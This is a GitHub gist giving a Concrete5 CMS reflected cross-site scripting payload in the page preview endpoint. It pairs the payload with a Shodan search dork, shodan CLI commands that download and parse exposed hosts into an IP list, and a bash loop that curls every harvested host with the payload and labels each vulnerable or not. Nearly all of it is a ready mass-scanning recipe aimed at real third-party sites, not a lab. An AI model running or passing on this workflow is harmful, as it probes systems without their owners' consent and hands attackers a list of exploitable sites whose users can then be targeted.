Skip to content

Instantly share code, notes, and snippets.

@simrotion13
Created January 6, 2022 14:38
Show Gist options
  • Save simrotion13/1ee0b0573d6e43f0f0e5cf38d4600d50 to your computer and use it in GitHub Desktop.
Save simrotion13/1ee0b0573d6e43f0f0e5cf38d4600d50 to your computer and use it in GitHub Desktop.
Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download concrete5 'Set-Cookie: CONCRETE5'
I already downlaod the results using shodan cli command
We will seperate the IP:PORT from shodan results. For this we will use shodan parse command along with awk
shodan parse concrete5.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a shodan-ip.txt
We will using below process to automate the findings
cat shodan-ip.txt | while read host do ; do curl --silent --path-as-is --insecure "https://$host/ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E" | grep -qs '"></iframe><img/src/onerror=.1|alert(document.domain)>' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
Check the Vulnerable URL
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment